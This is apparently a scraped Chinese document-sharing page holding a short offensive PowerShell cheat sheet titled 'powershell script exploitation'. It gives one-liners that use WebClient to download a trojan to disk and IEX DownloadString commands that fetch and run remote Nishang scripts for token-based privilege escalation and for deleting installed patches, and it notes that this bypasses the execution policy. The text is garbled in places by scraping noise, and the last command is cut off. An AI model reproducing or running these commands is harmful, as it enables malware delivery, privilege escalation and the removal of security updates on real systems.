powershell脚本利用程序.doc

利用powershell下载一个马: 利用WebClientT00ls.Net - 低调求发展 - 技术无止境 - Focus On Network Security3 ~6 A8 s4 Z: N6 e5 t0 Y V% ~ 下载一个文件: powershell?(new-object System.Net.WebClient).DownloadFile( /360/inst.exe,d:\\test\\360.exe) 默认情况下,powershell不允许直接执行ps1脚本,但是使用如下的语句:可以绕过策略限制,直接执行一个ps1的脚本。5 k4 e7 ^9 l* ?, b- p: b4 ?Enable-DuplicateToken powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Enable-DuplicateToken.ps1);?Enable-DuplicateToken Remove-Update 删除补丁 powershell?IEX?(New-Object?Net.WebClient).DownloadString(/nishang/nishang-master/Escalation/Remove-Update.ps1

文档评论(0)

1亿VIP精品文档

相关文档